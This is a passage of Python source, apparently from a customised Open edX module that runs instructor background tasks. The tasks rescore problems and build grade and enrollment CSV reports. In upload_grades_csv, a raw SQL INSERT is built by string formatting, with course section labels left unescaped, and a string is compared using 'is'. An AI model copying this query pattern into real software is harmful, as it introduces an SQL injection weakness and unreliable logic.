from openedx.core.djangoapps.content.course_structures.models import CourseStructure
from opaque_keys.edx.keys import UsageKey
from openedx.core.djangoapps.course_groups.cohorts import add_user_to_cohort, is_course_cohorted
from student.models import CourseEnrollment, CourseAccessRole
from verify_student.models import SoftwareSecurePhotoVerification
from util.query import use_read_replica_if_available
from cm_plugin.models import CmGradebook, CmGradebookRecords
# define different loggers for use within tasks and on client side
TASK_LOG = logging.getLogger('edx.celery.task')
# define value to use when no task_id is provided:
UNKNOWN_TASK_ID = 'unknown-task_id'
FILTERED_OUT_ROLES = ['staff', 'instructor', 'finance_admin', 'sales_admin']
# define values for update functions to use to return status to perform_module_state_update
UPDATE_STATUS_SUCCEEDED = 'succeeded'
UPDATE_STATUS_FAILED = 'failed'
UPDATE_STATUS_SKIPPED = 'skipped'
# The setting name used for events when "settings" (account settings, preferences, profile information) change.
REPORT_REQUESTED_EVENT_NAME = u'edx.instructor.report.requested'
class BaseInstructorTask(Task):
"""
Base task class for use with InstructorTask models.
Permits updating information about task in corresponding InstructorTask for monitoring purposes.
Assumes that the entry_id of the InstructorTask model is the first argument to the task.
The `entry_id` is the primary key for the InstructorTask entry representing the task. This class
updates the entry on success and failure of the task it wraps. It is setting the entry's value
for task_state based on what Celery would set it to once the task returns to Celery:
FAILURE if an exception is encountered, and SUCCESS if it returns normally.
Other arguments are pass-throughs to perform_module_state_update, and documented there.
"""
abstract = True
def on_success(self, task_progress, task_id, args, kwargs):
"""
Update InstructorTask object corresponding to this task with info about success.
Updates task_output and task_state. But it shouldn't actually do anything
if the task is only creating subtasks to actually do the work.
Assumes `task_progress` is a dict containing the task's result, with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages. Should be past-tense.
Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
This is JSON-serialized and stored in the task_output column of the InstructorTask entry.
"""
TASK_LOG.debug('Task %s: success returned with progress: %s', task_id, task_progress)
# We should be able to find the InstructorTask object to update
# based on the task_id here, without having to dig into the
# original args to the task. On the other hand, the entry_id
# is the first value passed to all such args, so we'll use that.
# And we assume that it exists, else we would already have had a failure.
entry_id = args[0]
entry = InstructorTask.objects.get(pk=entry_id)
# Check to see if any subtasks had been defined as part of this task.
# If not, then we know that we're done. (If so, let the subtasks
# handle updating task_state themselves.)
if len(entry.subtasks) == 0:
entry.task_output = InstructorTask.create_output_for_success(task_progress)
entry.task_state = SUCCESS
entry.save_now()
def on_failure(self, exc, task_id, args, kwargs, einfo):
"""
Update InstructorTask object corresponding to this task with info about failure.
Fetches and updates exception and traceback information on failure.
If an exception is raised internal to the task, it is caught by celery and provided here.
The information is recorded in the InstructorTask object as a JSON-serialized dict
stored in the task_output column. It contains the following keys:
'exception': type of exception object
'message': error message from exception object
'traceback': traceback information (truncated if necessary)
Note that there is no way to record progress made within the task (e.g. attempted,
succeeded, etc.) when such failures occur.
"""
TASK_LOG.debug(u'Task %s: failure returned', task_id)
entry_id = args[0]
try:
entry = InstructorTask.objects.get(pk=entry_id)
except InstructorTask.DoesNotExist:
# if the InstructorTask object does not exist, then there's no point
# trying to update it.
TASK_LOG.error(u"Task (%s) has no InstructorTask object for id %s", task_id, entry_id)
else:
TASK_LOG.warning(u"Task (%s) failed", task_id, exc_info=True)
entry.task_output = InstructorTask.create_output_for_failure(einfo.exception, einfo.traceback)
entry.task_state = FAILURE
entry.save_now()
class UpdateProblemModuleStateError(Exception):
"""
Error signaling a fatal condition while updating problem modules.
Used when the current module cannot be processed and no more
modules should be attempted.
"""
pass
def _get_current_task():
"""
Stub to make it easier to test without actually running Celery.
This is a wrapper around celery.current_task, which provides access
to the top of the stack of Celery's tasks. When running tests, however,
it doesn't seem to work to mock current_task directly, so this wrapper
is used to provide a hook to mock in tests, while providing the real
`current_task` in production.
"""
return current_task
class TaskProgress(object):
"""
Encapsulates the current task's progress by keeping track of
'attempted', 'succeeded', 'skipped', 'failed', 'total',
'action_name', and 'duration_ms' values.
"""
def __init__(self, action_name, total, start_time):
self.action_name = action_name
self.total = total
self.start_time = start_time
self.attempted = 0
self.succeeded = 0
self.skipped = 0
self.failed = 0
def update_task_state(self, extra_meta=None):
"""
Update the current celery task's state to the progress state
specified by the current object. Returns the progress
dictionary for use by `run_main_task` and
`BaseInstructorTask.on_success`.
Arguments:
extra_meta (dict): Extra metadata to pass to `update_state`
Returns:
dict: The current task's progress dict
"""
progress_dict = {
'action_name': self.action_name,
'attempted': self.attempted,
'succeeded': self.succeeded,
'skipped': self.skipped,
'failed': self.failed,
'total': self.total,
'duration_ms': int((time() - self.start_time) * 1000),
}
if extra_meta is not None:
progress_dict.update(extra_meta)
_get_current_task().update_state(state=PROGRESS, meta=progress_dict)
return progress_dict
def run_main_task(entry_id, task_fcn, action_name):
"""
Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask.
Arguments passed to `task_fcn` are:
`entry_id` : the primary key for the InstructorTask entry representing the task.
`course_id` : the id for the course.
`task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input.
`action_name` : past-tense verb to use for constructing status messages.
If no exceptions are raised, the `task_fcn` should return a dict containing
the task's result with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages.
Should be past-tense. Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
"""
# Get the InstructorTask to be updated. If this fails then let the exception return to Celery.
# There's no point in catching it here.
entry = InstructorTask.objects.get(pk=entry_id)
entry.task_state = PROGRESS
entry.save_now()
# Get inputs to use in this task from the entry
task_id = entry.task_id
course_id = entry.course_id
task_input = json.loads(entry.task_input)
# Construct log message
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input)
TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name)
# Check that the task_id submitted in the InstructorTask matches the current task
# that is running.
request_task_id = _get_current_task().request.id
if task_id != request_task_id:
fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"'
message = fmt.format(task_info=task_info_string, actual_id=request_task_id)
TASK_LOG.error(message)
raise ValueError(message)
# Now do the work
with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]):
task_progress = task_fcn(entry_id, course_id, task_input, action_name)
# Release any queries that the connection has been hanging onto
reset_queries()
# Log and exit, returning task_progress info as task result
TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress)
return task_progress
def perform_module_state_update(update_fcn, filter_fcn, _entry_id, course_id, task_input, action_name):
"""
Performs generic update by visiting StudentModule instances with the update_fcn provided.
StudentModule instances are those that match the specified `course_id` and `module_state_key`.
If `student_identifier` is not None, it is used as an additional filter to limit the modules to those belonging
to that student. If `student_identifier` is None, performs update on modules for all students on the specified problem.
If a `filter_fcn` is not None, it is applied to the query that has been constructed. It takes one
argument, which is the query being filtered, and returns the filtered version of the query.
The `update_fcn` is called on each StudentModule that passes the resulting filtering.
It is passed three arguments: the module_descriptor for the module pointed to by the
module_state_key, the particular StudentModule to update, and the xmodule_instance_args being
passed through. If the value returned by the update function evaluates to a boolean True,
the update is successful; False indicates the update on the particular student module failed.
A raised exception indicates a fatal condition -- that no other student modules should be considered.
The return value is a dict containing the task's results, with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible updates to attempt
'action_name': user-visible verb to use in status messages. Should be past-tense.
Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
Because this is run internal to a task, it does not catch exceptions. These are allowed to pass up to the
next level, so that it can set the failure modes and capture the error trace in the InstructorTask and the
result object.
"""
start_time = time()
usage_keys = []
problem_url = task_input.get('problem_url')
entrance_exam_url = task_input.get('entrance_exam_url')
student_identifier = task_input.get('student')
problems = {}
# if problem_url is present make a usage key from it
if problem_url:
usage_key = course_id.make_usage_key_from_deprecated_string(problem_url)
usage_keys.append(usage_key)
# find the problem descriptor:
problem_descriptor = modulestore().get_item(usage_key)
problems[unicode(usage_key)] = problem_descriptor
# if entrance_exam is present grab all problems in it
if entrance_exam_url:
problems = get_problems_in_section(entrance_exam_url)
usage_keys = [UsageKey.from_string(location) for location in problems.keys()]
# find the modules in question
modules_to_update = StudentModule.objects.filter(course_id=course_id, module_state_key__in=usage_keys)
# give the option of updating an individual student. If not specified,
# then updates all students who have responded to a problem so far
student = None
if student_identifier is not None:
# if an identifier is supplied, then look for the student,
# and let it throw an exception if none is found.
if "@" in student_identifier:
student = User.objects.get(email=student_identifier)
elif student_identifier is not None:
student = User.objects.get(username=student_identifier)
if student is not None:
modules_to_update = modules_to_update.filter(student_id=student.id)
if filter_fcn is not None:
modules_to_update = filter_fcn(modules_to_update)
task_progress = TaskProgress(action_name, modules_to_update.count(), start_time)
task_progress.update_task_state()
for module_to_update in modules_to_update:
task_progress.attempted += 1
module_descriptor = problems[unicode(module_to_update.module_state_key)]
# There is no try here: if there's an error, we let it throw, and the task will
# be marked as FAILED, with a stack trace.
with dog_stats_api.timer('instructor_tasks.module.time.step', tags=[u'action:{name}'.format(name=action_name)]):
update_status = update_fcn(module_descriptor, module_to_update)
if update_status == UPDATE_STATUS_SUCCEEDED:
# If the update_fcn returns true, then it performed some kind of work.
# Logging of failures is left to the update_fcn itself.
task_progress.succeeded += 1
elif update_status == UPDATE_STATUS_FAILED:
task_progress.failed += 1
elif update_status == UPDATE_STATUS_SKIPPED:
task_progress.skipped += 1
else:
raise UpdateProblemModuleStateError("Unexpected update_status returned: {}".format(update_status))
return task_progress.update_task_state()
def _get_task_id_from_xmodule_args(xmodule_instance_args):
"""Gets task_id from `xmodule_instance_args` dict, or returns default value if missing."""
return xmodule_instance_args.get('task_id', UNKNOWN_TASK_ID) if xmodule_instance_args is not None else UNKNOWN_TASK_ID
def _get_xqueue_callback_url_prefix(xmodule_instance_args):
"""Gets prefix to use when constructing xqueue_callback_url."""
return xmodule_instance_args.get('xqueue_callback_url_prefix', '') if xmodule_instance_args is not None else ''
def _get_track_function_for_task(student, xmodule_instance_args=None, source_page='x_module_task'):
"""
Make a tracking function that logs what happened.
For insertion into ModuleSystem, and used by CapaModule, which will
provide the event_type (as string) and event (as dict) as arguments.
The request_info and task_info (and page) are provided here.
"""
# get request-related tracking information from args passthrough, and supplement with task-specific
# information:
request_info = xmodule_instance_args.get('request_info', {}) if xmodule_instance_args is not None else {}
task_info = {'student': student.username, 'task_id': _get_task_id_from_xmodule_args(xmodule_instance_args)}
return lambda event_type, event: task_track(request_info, task_info, event_type, event, page=source_page)
def _get_module_instance_for_task(course_id, student, module_descriptor, xmodule_instance_args=None,
grade_bucket_type=None, course=None):
"""
Fetches a StudentModule instance for a given `course_id`, `student` object, and `module_descriptor`.
`xmodule_instance_args` is used to provide information for creating a track function and an XQueue callback.
These are passed, along with `grade_bucket_type`, to get_module_for_descriptor_internal, which sidesteps
the need for a Request object when instantiating an xmodule instance.
"""
# reconstitute the problem's corresponding XModule:
field_data_cache = FieldDataCache.cache_for_descriptor_descendents(course_id, student, module_descriptor)
# get request-related tracking information from args passthrough, and supplement with task-specific
# information:
request_info = xmodule_instance_args.get('request_info', {}) if xmodule_instance_args is not None else {}
task_info = {"student": student.username, "task_id": _get_task_id_from_xmodule_args(xmodule_instance_args)}
def make_track_function():
'''
Make a tracking function that logs what happened.
For insertion into ModuleSystem, and used by CapaModule, which will
provide the event_type (as string) and event (as dict) as arguments.
The request_info and task_info (and page) are provided here.
'''
return lambda event_type, event: task_track(request_info, task_info, event_type, event, page='x_module_task')
xqueue_callback_url_prefix = xmodule_instance_args.get('xqueue_callback_url_prefix', '') \
if xmodule_instance_args is not None else ''
return get_module_for_descriptor_internal(
user=student,
descriptor=module_descriptor,
field_data_cache=field_data_cache,
course_id=course_id,
track_function=make_track_function(),
xqueue_callback_url_prefix=xqueue_callback_url_prefix,
grade_bucket_type=grade_bucket_type,
# This module isn't being used for front-end rendering
request_token=None,
# pass in a loaded course for override enabling
course=course
)
@transaction.autocommit
def rescore_problem_module_state(xmodule_instance_args, module_descriptor, student_module):
'''
Takes an XModule descriptor and a corresponding StudentModule object, and
performs rescoring on the student's problem submission.
Throws exceptions if the rescoring is fatal and should be aborted if in a loop.
In particular, raises UpdateProblemModuleStateError if module fails to instantiate,
or if the module doesn't support rescoring.
Returns True if problem was successfully rescored for the given student, and False
if problem encountered some kind of error in rescoring.
'''
# unpack the StudentModule:
course_id = student_module.course_id
student = student_module.student
usage_key = student_module.module_state_key
with modulestore().bulk_operations(course_id):
course = get_course_by_id(course_id)
# TODO: Here is a call site where we could pass in a loaded course. I
# think we certainly need it since grading is happening here, and field
# overrides would be important in handling that correctly
instance = _get_module_instance_for_task(
course_id,
student,
module_descriptor,
xmodule_instance_args,
grade_bucket_type='rescore',
course=course
)
if instance is None:
# Either permissions just changed, or someone is trying to be clever
# and load something they shouldn't have access to.
msg = "No module {loc} for student {student}--access denied?".format(
loc=usage_key,
student=student
)
TASK_LOG.debug(msg)
raise UpdateProblemModuleStateError(msg)
if not hasattr(instance, 'rescore_problem'):
# This should also not happen, since it should be already checked in the caller,
# but check here to be sure.
msg = "Specified problem does not support rescoring."
raise UpdateProblemModuleStateError(msg)
result = instance.rescore_problem()
instance.save()
if 'success' not in result:
# don't consider these fatal, but false means that the individual call didn't complete:
TASK_LOG.warning(
u"error processing rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: unexpected response %(msg)s",
dict(
msg=result,
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_FAILED
elif result['success'] not in ['correct', 'incorrect']:
TASK_LOG.warning(
u"error processing rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: %(msg)s",
dict(
msg=result['success'],
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_FAILED
else:
TASK_LOG.debug(
u"successfully processed rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: %(msg)s",
dict(
msg=result['success'],
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_SUCCEEDED
@transaction.autocommit
def reset_attempts_module_state(xmodule_instance_args, _module_descriptor, student_module):
"""
Resets problem attempts to zero for specified `student_module`.
Returns a status of UPDATE_STATUS_SUCCEEDED if a problem has non-zero attempts
that are being reset, and UPDATE_STATUS_SKIPPED otherwise.
"""
update_status = UPDATE_STATUS_SKIPPED
problem_state = json.loads(student_module.state) if student_module.state else {}
if 'attempts' in problem_state:
old_number_of_attempts = problem_state["attempts"]
if old_number_of_attempts > 0:
problem_state["attempts"] = 0
# convert back to json and save
student_module.state = json.dumps(problem_state)
student_module.save()
# get request-related tracking information from args passthrough,
# and supplement with task-specific information:
track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)
event_info = {"old_attempts": old_number_of_attempts, "new_attempts": 0}
track_function('problem_reset_attempts', event_info)
update_status = UPDATE_STATUS_SUCCEEDED
return update_status
@transaction.autocommit
def delete_problem_module_state(xmodule_instance_args, _module_descriptor, student_module):
"""
Delete the StudentModule entry.
Always returns UPDATE_STATUS_SUCCEEDED, indicating success, if it doesn't raise an exception due to database error.
"""
student_module.delete()
# get request-related tracking information from args passthrough,
# and supplement with task-specific information:
track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)
track_function('problem_delete_state', {})
return UPDATE_STATUS_SUCCEEDED
def upload_csv_to_report_store(rows, csv_name, course_id, timestamp, config_name='GRADES_DOWNLOAD'):
"""
Upload data as a CSV using ReportStore.
Arguments:
rows: CSV data in the following format (first column may be a
header):
[
[row1_colum1, row1_colum2, ...],
...
]
csv_name: Name of the resulting CSV
course_id: ID of the course
"""
report_store = ReportStore.from_config(config_name)
report_store.store_rows(
course_id,
u"{course_prefix}_{csv_name}_{timestamp_str}.csv".format(
course_prefix=course_filename_prefix_generator(course_id),
csv_name=csv_name,
timestamp_str=timestamp.strftime("%Y-%m-%d-%H%M")
),
rows
)
tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": csv_name, })
def upload_exec_summary_to_store(data_dict, report_name, course_id, generated_at, config_name='FINANCIAL_REPORTS'):
"""
Upload Executive Summary Html file using ReportStore.
Arguments:
data_dict: containing executive report data.
report_name: Name of the resulting Html File.
course_id: ID of the course
"""
report_store = ReportStore.from_config(config_name)
# Use the data dict and html template to generate the output buffer
output_buffer = StringIO(render_to_string("instructor/instructor_dashboard_2/executive_summary.html", data_dict))
report_store.store(
course_id,
u"{course_prefix}_{report_name}_{timestamp_str}.html".format(
course_prefix=course_filename_prefix_generator(course_id),
report_name=report_name,
timestamp_str=generated_at.strftime("%Y-%m-%d-%H%M")
),
output_buffer,
config={
'content_type': 'text/html',
'content_encoding': None,
}
)
tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": report_name})
def upload_grades_csv(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name): # pylint: disable=too-many-statements
"""
For a given `course_id`, generate a grades CSV file for all students that
are enrolled, and store using a `ReportStore`. Once created, the files can
be accessed by instantiating another `ReportStore` (via
`ReportStore.from_config()`) and calling `link_for()` on it. Writes are
buffered, so we'll never write part of a CSV file to S3 -- i.e. any files
that are visible in ReportStore will be complete ones.
As we start to add more CSV downloads, it will probably be worthwhile to
make a more general CSVDoc class instead of building out the rows like we
do here.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
course = get_course_by_id(course_id)
course_is_cohorted = is_course_cohorted(course.id)
cohorts_header = ['Cohort Name'] if course_is_cohorted else []
experiment_partitions = get_split_user_partitions(course.user_partitions)
group_configs_header = [u'Experiment Group ({})'.format(partition.name) for partition in experiment_partitions]
certificate_info_header = ['Certificate Eligible', 'Certificate Delivered', 'Certificate Type']
certificate_whitelist = CertificateWhitelist.objects.filter(course_id=course_id, whitelist=True)
whitelisted_user_ids = [entry.user_id for entry in certificate_whitelist]
cm_gradebook, gb_created = CmGradebook.objects.get_or_create(course_id=str(course_id))
cm_gradebook.state = 'pending'
cm_gradebook.save()
cursor = connection.cursor()
insert_records = ""
# Loop over all our students and build our CSV lists in memory
header = None
rows = []
gradebook_header = None
err_rows = [["id", "username", "error_msg"]]
current_step = {'step': 'Calculating Grades'}
total_enrolled_students = enrolled_students.count()
student_counter = 0
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Starting grade calculation for total students: %s',
task_info_string,
action_name,
current_step,
total_enrolled_students
)
for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students):
# Periodically update task status (this is a cache write)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# Now add a log entry after each student is graded to get a sense
# of the task's progress
student_counter += 1
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Grade calculation in-progress for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_enrolled_students
)
if gradeset:
# We were able to successfully grade this student for this course.
task_progress.succeeded += 1
if not header:
header = [section['label'] for section in gradeset[u'section_breakdown']]
rows.append(
["id", "email", "username", "grade"] + header + cohorts_header +
group_configs_header + ['Enrollment Track', 'Verification Status'] + certificate_info_header
)
gradebook_header = ["id", "email", "username", "grade"] + header + ["Certificate Eligible"]
percents = {
section['label']: section.get('percent', 0.0)
for section in gradeset[u'section_breakdown']
if 'label' in section
}
cohorts_group_name = []
if course_is_cohorted:
group = get_cohort(student, course_id, assign=False)
cohorts_group_name.append(group.name if group else '')
group_configs_group_names = []
for partition in experiment_partitions:
group = LmsPartitionService(student, course_id).get_group(partition, assign=False)
group_configs_group_names.append(group.name if group else '')
enrollment_mode = CourseEnrollment.enrollment_mode_for_user(student, course_id)[0]
verification_status = SoftwareSecurePhotoVerification.verification_status_for_user(
student,
course_id,
enrollment_mode
)
certificate_info = certificate_info_for_user(
student,
course_id,
gradeset['grade'],
student.id in whitelisted_user_ids
)
# Not everybody has the same gradable items. If the item is not
# found in the user's gradeset, just assume it's a 0. The aggregated
# grades for their sections and overall course will be calculated
# without regard for the item they didn't have access to, so it's
# possible for a student to have a 0.0 show up in their row but
# still have 100% for the course.
row_percents = [percents.get(label, 0.0) for label in header]
rows.append(
[student.id, student.email, student.username, gradeset['percent']] +
row_percents + cohorts_group_name + group_configs_group_names +
[enrollment_mode] + [verification_status] + certificate_info
)
certificate_eligible = 0.0 if certificate_info[0] is 'N' else 1.0
insert_records += "('%s', '%s', %f, %d, now(), now()), " % (MySQLdb.escape_string(student.email), certificate_info_header[0], certificate_eligible, cm_gradebook.id)
for label in header:
score = percents.get(label, 0.0)
if score != 0.0:
insert_records += "('%s', '%s', %f, %d, now(), now()), " % (MySQLdb.escape_string(student.email), label, score, cm_gradebook.id)
insert_records += "('%s', 'grade', %f, %d, now(), now()), " % (MySQLdb.escape_string(student.email), gradeset['percent'] if gradeset['percent'] is not None else 0.0, cm_gradebook.id)
else:
# An empty gradeset means we failed to grade a student.
task_progress.failed += 1
err_rows.append([student.id, student.username, err_msg])
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Grade calculation completed for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_enrolled_students
)
try:
query = "INSERT INTO cm_plugin_cmgradebookrecords (user_email,unit_name, score, cm_gradebook_id, created_at, updated_at) VALUES %s ON DUPLICATE KEY UPDATE score = VALUES(cm_plugin_cmgradebookrecords.score), updated_at = VALUES(cm_plugin_cmgradebookrecords.updated_at)" % insert_records[:-2]
cursor.execute(query)
except DatabaseError as fail:
TASK_LOG.error("Insert command failed for gradebook id => %d . Error: %s" % (cm_gradebook.id, str(fail)))
finally:
cursor.close()
cm_gradebook.state = 'completed'
cm_gradebook.headers = ",".join(gradebook_header) if gradebook_header is not None else ''
cm_gradebook.save()
# By this point, we've got the rows we're going to stuff into our CSV files.
current_step = {'step': 'Uploading CSVs'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_csv_to_report_store(rows, 'grade_report', course_id, start_date)
# If there are any error rows (don't count the header), write them out as well
if len(err_rows) > 1:
upload_csv_to_report_store(err_rows, 'grade_report_err', course_id, start_date)
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing grade task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def _order_problems(blocks):
"""
Sort the problems by the assignment type and assignment that it belongs to.
Args:
blocks (OrderedDict) - A course structure containing blocks that have been ordered
(i.e. when we iterate over them, we will see them in the order
that they appear in the course).
Returns:
an OrderedDict that maps a problem id to its headers in the final report.
"""
problems = OrderedDict()
assignments = dict()
# First, sort out all the blocks into their correct assignments and all the
# assignments into their correct types.
for block in blocks:
# Put the assignments in order into the assignments list.
if blocks[block]['block_type'] == 'sequential':
block_format = blocks[block]['format']
if block_format not in assignments:
assignments[block_format] = OrderedDict()
assignments[block_format][block] = list()
# Put the problems into the correct order within their assignment.
if blocks[block]['block_type'] == 'problem' and blocks[block]['graded'] is True:
current = blocks[block]['parent']
# crawl up the tree for the sequential block
while blocks[current]['block_type'] != 'sequential':
current = blocks[current]['parent']
current_format = blocks[current]['format']
assignments[current_format][current].append(block)
# Now that we have a sorting and an order for the assignments and problems,
# iterate through them in order to generate the header row.
for assignment_type in assignments:
for assignment_index, assignment in enumerate(assignments[assignment_type].keys(), start=1):
for problem in assignments[assignment_type][assignment]:
header_name = u"{assignment_type} {assignment_index}: {assignment_name} - {block}".format(
block=blocks[problem]['display_name'],
assignment_type=assignment_type,
assignment_index=assignment_index,
assignment_name=blocks[assignment]['display_name']
)
problems[problem] = [header_name + " (Earned)", header_name + " (Possible)"]
return problems
def upload_problem_grade_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
Generate a CSV containing all students' problem grades within a given
`course_id`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
# This struct encapsulates both the display names of each static item in the
# header row as values as well as the django User field names of those items
# as the keys. It is structured in this way to keep the values related.
header_row = OrderedDict([('id', 'Student ID'), ('email', 'Email'), ('username', 'Username')])
try:
course_structure = CourseStructure.objects.get(course_id=course_id)
blocks = course_structure.ordered_blocks
problems = _order_problems(blocks)
except CourseStructure.DoesNotExist:
return task_progress.update_task_state(
extra_meta={'step': 'Generating course structure. Please refresh and try again.'}
)
# Just generate the static fields for now.
rows = [list(header_row.values()) + ['Final Grade'] + list(chain.from_iterable(problems.values()))]
error_rows = [list(header_row.values()) + ['error_msg']]
current_step = {'step': 'Calculating Grades'}
for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students, keep_raw_scores=True):
student_fields = [getattr(student, field_name) for field_name in header_row]
task_progress.attempted += 1
if 'percent' not in gradeset or 'raw_scores' not in gradeset:
# There was an error grading this student.
# Generally there will be a non-empty err_msg, but that is not always the case.
if not err_msg:
err_msg = u"Unknown error"
error_rows.append(student_fields + [err_msg])
task_progress.failed += 1
continue
final_grade = gradeset['percent']
# Only consider graded problems
problem_scores = {unicode(score.module_id): score for score in gradeset['raw_scores'] if score.graded}
earned_possible_values = list()
for problem_id in problems:
try:
problem_score = problem_scores[problem_id]
earned_possible_values.append([problem_score.earned, problem_score.possible])
except KeyError:
# The student has not been graded on this problem. For example,
# iterate_grades_for skips problems that students have never
# seen in order to speed up report generation. It could also be
# the case that the student does not have access to it (e.g. A/B
# test or cohorted courseware).
earned_possible_values.append(['N/A', 'N/A'])
rows.append(student_fields + [final_grade] + list(chain.from_iterable(earned_possible_values)))
task_progress.succeeded += 1
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload if any students have been successfully graded
if len(rows) > 1:
upload_csv_to_report_store(rows, 'problem_grade_report', course_id, start_date)
# If there are any error rows, write them out as well
if len(error_rows) > 1:
upload_csv_to_report_store(error_rows, 'problem_grade_report_err', course_id, start_date)
return task_progress.update_task_state(extra_meta={'step': 'Uploading CSV'})
def upload_students_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing profile
information for all students that are enrolled, and store using a
`ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
current_step = {'step': 'Calculating Profile Info'}
task_progress.update_task_state(extra_meta=current_step)
# compute the student features table and format it
query_features = task_input.get('features')
student_data = enrolled_students_features(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'student_profile_info', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def upload_enrollment_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing profile
information for all students that are enrolled, and store using a
`ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
students_in_course = CourseEnrollment.objects.enrolled_and_dropped_out_users(course_id)
task_progress = TaskProgress(action_name, students_in_course.count(), start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
# Loop over all our students and build our CSV lists in memory
rows = []
header = None
current_step = {'step': 'Gathering Profile Information'}
enrollment_report_provider = PaidCourseEnrollmentReportProvider()
total_students = students_in_course.count()
student_counter = 0
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, generating detailed enrollment report for total students: %s',
task_info_string,
action_name,
current_step,
total_students
)
for student in students_in_course:
# Periodically update task status (this is a cache write)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# Now add a log entry after certain intervals to get a hint that task is in progress
student_counter += 1
if student_counter % 100 == 0:
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, gathering enrollment profile for students in progress: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_students
)
user_data = enrollment_report_provider.get_user_profile(student.id)
course_enrollment_data = enrollment_report_provider.get_enrollment_info(student, course_id)
payment_data = enrollment_report_provider.get_payment_info(student, course_id)
# display name map for the column headers
enrollment_report_headers = {
'User ID': _('User ID'),
'Username': _('Username'),
'Full Name': _('Full Name'),
'First Name': _('First Name'),
'Last Name': _('Last Name'),
'Company Name': _('Company Name'),
'Title': _('Title'),
'Language': _('Language'),
'Year of Birth': _('Year of Birth'),
'Gender': _('Gender'),
'Level of Education': _('Level of Education'),
'Mailing Address': _('Mailing Address'),
'Goals': _('Goals'),
'City': _('City'),
